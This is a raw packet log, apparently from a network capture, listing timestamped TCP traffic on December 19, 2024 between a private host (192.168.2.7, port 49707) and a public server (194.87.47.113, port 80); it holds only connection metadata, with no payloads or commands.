Dec 19, 2024 08:47:26.137828112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.138405085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.138772964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.139086962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.139210939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.145380020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.145524979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.145704985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.145752907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.146023035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.146230936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.146601915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.146805048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.146943092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.147351980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.147449970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.147618055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.148116112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.148245096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.148354053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.148896933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.148964882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.149394989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.149746895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.149760962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.149866104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.150477886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.150537968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.150784969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.151331902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.151345015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.151381969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.152076960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.152220964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.152291059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.160537958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.160650015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.160731077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.160995960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.161082029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.161312103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.161672115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.162023067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.162157059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.162384987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.163073063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.163202047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.163216114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.163239002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.163265944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.163955927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.164246082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.164318085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.164762020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.165019989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.165416002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.165522099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.165935040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.166311979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.166484118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.166484118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.166484118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.167195082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.167211056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.167347908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.167932034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.167952061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.168690920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.168853045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.168865919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.169022083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.169538975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.169552088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.169791937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.170269966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.170852900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.170936108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.171087980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.171102047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.171135902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.171919107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.171972990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.172348976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.172713041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.173619032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.173624039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.173639059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.173758984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.173811913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.174262047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.174274921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.174372911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.175029993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.175777912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.175858974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.175873041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.176170111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.176187992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.176600933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.176870108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.177158117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.177391052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.177666903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.177788019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.178210020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.178270102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.178359032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.179119110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.179131985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.179184914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.179801941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.180042028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.180133104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.180695057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.180811882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.180876970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.181530952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.181544065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.181648970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.182156086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.182487965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.182985067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.183187962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.183238983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.183238983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.183763981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.184423923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.184552908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.184566975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.184851885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.184926033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.185373068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.185417891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.186134100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.186155081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.186204910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.186460018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.186907053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.186919928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.186964035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.187707901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.188029051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.188116074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.188525915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.188539028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.189260006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.189373970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.189578056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.190053940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.190262079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.190274000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.190393925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.190987110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.191296101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.191380024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.329395056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.329530954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.329751968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.329845905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.329859972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.329933882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.330527067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.330868959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.331233978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.331336975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.337743044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.337976933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.338079929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.338327885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.338340998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.338462114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.338975906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.339349985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.339351892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.339716911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.339793921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.340020895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.340481043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.340732098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.340800047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.341276884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.341485977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.341695070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.342096090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.342457056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.342784882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.342900038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.342911959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.343049049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.343854904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.343947887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.344069958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.344455957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.344928980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.345055103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.352776051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.352972031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.353272915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.353657961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.354012966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.354024887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.354787111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.354799986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.354840040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.354840040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.354840040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.354840040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.355433941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.355767965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.356200933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.356765985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.357049942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.357301950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.357302904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.357302904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.357372046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.357820988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.358103037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.358575106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.358849049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.359338999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.359338999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.359441996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.359455109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.359850883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.360169888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.360946894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.361288071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.361386061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.361438990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.361975908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.362173080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.362289906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.362621069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.362656116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.363142967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.363246918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.363571882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.363903999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.364358902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.364773989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.364787102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.364962101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.365138054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.365159035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.365421057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.365825891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.366199970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.366317034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.366549015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.366925001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.367337942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.367364883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.367378950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.367444038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.368100882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.368407965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.368694067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.368876934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.368932962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.369170904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.369714022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.369781017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.370071888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.370486975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.370543957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.370697975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.371376038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.371665001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.371834040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.372167110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.372180939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.372256041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.372963905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.373117924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.373174906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.373658895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.374130964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.374219894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.374444008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.374456882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.374829054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.375200987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.375305891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.375390053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.376046896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.376105070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.376266003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.376806021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.377511024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.377639055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.377712011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.377724886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.377846956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.378397942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.378739119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.379218102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.379296064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.379457951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.379503965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.379959106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.380132914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.380361080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.380763054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.381491899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.381632090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.381732941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.381746054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.382386923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.382541895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.382541895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.382729053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.383088112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.383338928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.383491993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.434869051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.521491051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.521970034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.521981955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.522144079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.522382021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.522768974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.522783995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.523341894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.523341894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.523406029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.530085087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.530308962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.530725002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.530749083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.530767918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.531271935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.531354904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.531546116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.531721115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.531886101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.532322884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.532398939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.532596111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.533070087 CET	80	49707	194.87.47.113	192.168.2.7
